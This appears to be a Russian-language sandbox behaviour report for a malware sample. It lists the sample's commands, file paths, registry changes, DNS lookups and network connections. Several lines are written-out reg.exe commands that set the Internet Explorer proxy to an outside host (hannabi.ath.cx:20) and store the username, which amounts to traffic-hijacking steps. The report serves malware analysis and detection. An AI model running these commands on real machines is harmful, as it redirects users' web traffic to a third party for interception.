Техническая информация
- %PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE http://www.go##le.fr/
- <SYSTEM32>\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /f /v ID
- <SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /f /v ProxyServer /d "http=172.16.1.2:8080;https=172.16.1.2:8080"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\fichier.bat""
- <SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /f /v ProxyServer /d "http=hannabi.ath.cx:20;https=hannabi.ath.cx:20"
- <SYSTEM32>\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /f /v ID /d %USERNAME%
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings] 'ProxyServer' = 'http=172.16.1.2:8080;https=172.16.1.2:8080'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings] 'ProxyServer' = 'http=hannabi.ath.cx:20;https=hannabi.ath.cx:20'
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\google[1]
- %TEMP%\1.tmp\fichier.bat
- %TEMP%\1.tmp\fichier.bat
- 'www.go##le.fr':80
- 'localhost':1034
- www.go##le.fr/
- DNS ASK www.go##le.fr
- '<IP-адрес в локальной сети>':1035
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''